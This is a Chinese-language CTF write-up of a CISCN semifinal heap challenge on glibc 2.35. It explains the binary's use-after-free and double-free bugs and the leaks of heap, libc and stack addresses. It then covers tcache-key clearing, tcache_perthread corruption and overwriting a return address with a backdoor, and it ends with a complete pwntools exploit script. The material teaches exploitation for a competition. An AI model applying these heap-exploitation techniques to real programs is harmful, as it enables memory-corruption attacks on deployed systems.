前言

找华南赛区的师傅要了一份半决赛的Pwn题，听说只有一道题。

题目很简单，可以申请任意大小chunk，并存在UAF、DoubleFree漏洞。

还给了后门函数，不过限制是edit只能写8字节的数据到chunk中。

MyHeap

逆向分析

拖入IDA分析：

题目给了2.35版本的libc和ld，经典菜单题。逐个功能分析。

add函数：

可以申请任意大小的chunk，只能同时有一个chunk指针存储在bss段。并且可以申请0x4F0大小chunk，但是没有返回指针。

delete函数：

没有清空指针，存在UAF漏洞。

show函数：

打印chunk中7个字节数据，进行了异或加密，解密即可。可以用来泄露libc地址和heap地址。

edit函数：

可以修改8个字节的数据即fd指针位置。

最后给了一个后门函数：

可以泄露backdoor的地址，并且能够写一次16字节到chunk上，即同时覆盖fd和bk指针。

利用思路

题目保护全开，思路很清晰：

• 存在UAF漏洞，可以泄露libc和heap基地址。
• 可以输出backdoor函数地址，即泄露了程序基地址。（也就可以计算出bss_ptr的地址）
• 能够覆盖一次bk指针，可以清除tcache key进行double free，实现tcache attack。

既然实现了tcache attack，就可以任意地址（0x10对齐的地址）写8字节了。

由于只能写8字节数据，并且只能在0x10对齐的地址上写，需要考虑将backdoor函数写到哪里。

2.34开始，exit删除了dl_rtld_lock_recursiveh和dl_rtld_unlock_recursive，也就是我们常说的exit_hook。

当然，更没有malloc_hook、free_hook等函数了。这里提供3个攻击思路：

• 通过tls_dtor_list劫持exit，需要先泄露pointer_guard。
• 更简单的方法，直接修改vtable中的 overflow 或者 xsputn 等函数。（这个题的libc中vtable不可写）
• 泄露environ变量栈地址，然后修改返回地址为backdoor。

这里介绍第三种方法，将backdoor写回栈上的返回地址。

利用过程

编写异或解密函数：

def decrypt():p.recvuntil(b"the data:")enc = bytearray(p.recv(7))for i in range(7):enc[i] ^= (i + 153)return bytes(enc)

先泄露libc和heap地址：

# leak heap
add_chunk(0x88)
delete_chunk()
show_chunk()
heap_base = u64(decrypt().ljust(8, b'\x00')) << 12
success("heap_base = " + hex(heap_base))# leak libc
add_chunk(0x418)## avoid merge to top_chunk
p.sendlineafter(b"edit\n", b"1")
p.sendlineafter(b"choose?\n", b"2")delete_chunk()
show_chunk()
libc_base = u64(decrypt().ljust(8, b'\x00')) - 0x242ce0 + 0x50000
libc.address = libc_base
environ = libc.sym['environ']
success("libc_base = " + hex(libc_base))
success("environ = " + hex(environ))

然后开始利用。

然而，使用后门函数清除key后进行double free，然后tcache poisoning，只能完成一次任意地址写。

因此，我们需要利用这一次tcache poisoning控制tcache_perthread，控制tcache的个数，实现tcache_perthread。

这样一来，由于我们可以写8个字节数据。可以控制4个tcache的个数，分别是0x20到0x50。

add_chunk(0x88)
delete_chunk()
p.sendlineafter(b"edit\n", b"5")
p.recvuntil(b"address: ")
backdoor = int(p.recv(14), 16)
elf_base = backdoor - 0x12be
success("elf_base = " + hex(elf_base))
success("backdoor = " + hex(backdoor))
p.sendafter(b'data:', p64(0) + p64(0))	# clear tcache_key
delete_chunk()
target = heap_base + 0x10
edit_chunk(p64(heap_base >> 12 ^ target))
add_chunk(0x88)
add_chunk(0x88)
delete_chunk()
edit_chunk(p64(0))

我们已经成功控制的tcache_perthread的前8字节，然后往0x20和0x30大小的tcache中分别放入一个chunk用于后续tcache poisoning。

刚才释放的tcache_perthread放入了0x290的tcache中，再次申请回来并修改对应tcache大小为2。

add_chunk(0x18)
delete_chunk()add_chunk(0x28)
delete_chunk()add_chunk(0x288)
delete_chunk()
edit_chunk(p16(2) + p16(2) + p16(0) + p16(0))

利用0x20大小的tcache泄露environ变量：

# leak stack
add_chunk(0x18)
delete_chunk()
edit_chunk(p64((heap_base >> 12) ^ environ))
add_chunk(0x18)
add_chunk(0x18)
show_chunk()stack_addr = u64(decrypt().ljust(8, b'\x00'))
success("stack_addr = " + hex(stack_addr))

利用0x30大小的tcache控制bss段的chunk指针指向自己：

# bss_ptr->&bss_ptr
add_chunk(0x28)
delete_chunk()
target = elf_base + 0x4040
edit_chunk(p64((heap_base >> 12) ^ target))
add_chunk(0x28)
add_chunk(0x28)

然后，两次edit将backdoor写到返回地址：

# ret_addr->backdoor
target = stack_addr - 0x140
edit_chunk(p64(target))# gdb.attach(p, 'b *$rebase(0x1494)\nc')
# pause()edit_chunk(p64(backdoor))

这里说一下为什么最后一次tcache poisoning需要控制bss段上的chunk指针而不是直接控制返回地址。

glibc2.32开始引入对申请和释放tcache时地址检查，地址必须0x10对齐，因此通过bss段上的chunk指针可以绕过这个保护。

这里还存在一个问题，直接返回backdoor的话会崩，gdb调试发现：

刚学pwn的时候ROP到system(“/bin/sh”)会崩，很多师傅告诉我是堆栈平衡的原因，这次仔细分析了一下。

是因为movaps这条汇编指令是SSE指令，考虑到效率问题，操作数必须0x10字节对齐。

因此，在执行system函数前，我们只需要将栈里多或少放0x8字节数据即可。

这里处理的话是让backdoor + 8，少执行一次push rbp。完整exp如下所示：

from pwn import *elf = ELF("./pwn")
libc = ELF("./libc-2.35.so")
ld = ELF('./ld-2.35.so')p = process([elf.path])
context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'def add_chunk(size):p.sendlineafter(b"edit\n", b"1")p.sendlineafter(b"choose?\n", b"1")p.sendlineafter(b"size:", str(size).encode())def delete_chunk():p.sendlineafter(b"edit\n", b"2")def show_chunk():p.sendlineafter(b"edit\n", b"3")def edit_chunk(content):p.sendlineafter(b"edit\n", b"4")p.sendafter(b"data:", content)def decrypt():p.recvuntil(b"the data:")enc = bytearray(p.recv(7))for i in range(7):enc[i] ^= (i + 153)return bytes(enc)# leak heap
add_chunk(0x88)
delete_chunk()
show_chunk()
heap_base = u64(decrypt().ljust(8, b'\x00')) << 12
success("heap_base = " + hex(heap_base))# leak libc
add_chunk(0x418)
p.sendlineafter(b"edit\n", b"1")
p.sendlineafter(b"choose?\n", b"2")
delete_chunk()
show_chunk()libc_base = u64(decrypt().ljust(8, b'\x00')) - 0x242ce0 + 0x50000
libc.address = libc_base
environ = libc.sym['environ']
success("libc_base = " + hex(libc_base))
success("environ = " + hex(environ))# tcache_perthread corruption
add_chunk(0x88)
delete_chunk()
p.sendlineafter(b"edit\n", b"5")
p.recvuntil(b"address: ")
backdoor = int(p.recv(14), 16)
elf_base = backdoor - 0x12be
success("elf_base = " + hex(elf_base))
success("backdoor = " + hex(backdoor))
p.sendafter(b'data:', p64(0) + p64(0))
delete_chunk()
target = heap_base + 0x10
edit_chunk(p64(heap_base >> 12 ^ target))
add_chunk(0x88)
add_chunk(0x88)
delete_chunk()
edit_chunk(p64(0))add_chunk(0x18)
delete_chunk()add_chunk(0x28)
delete_chunk()add_chunk(0x288)
delete_chunk()
edit_chunk(p16(2) + p16(2) + p16(0) + p16(0))# leak stack
add_chunk(0x18)
delete_chunk()
edit_chunk(p64((heap_base >> 12) ^ environ))
add_chunk(0x18)
add_chunk(0x18)
show_chunk()stack_addr = u64(decrypt().ljust(8, b'\x00'))
success("stack_addr = " + hex(stack_addr))# ret_addr -> backdoor
add_chunk(0x28)
delete_chunk()
target = elf_base + 0x4040
edit_chunk(p64((heap_base >> 12) ^ target))
add_chunk(0x28)
add_chunk(0x28)target = stack_addr - 0x140
edit_chunk(p64(target))# gdb.attach(p, 'b *$rebase(0x1494)\nc')
# pause()edit_chunk(p64(backdoor + 8))p.interactive()

附件

关注vx公众号【Real返璞归真】回复【ciscn】获取题目附件。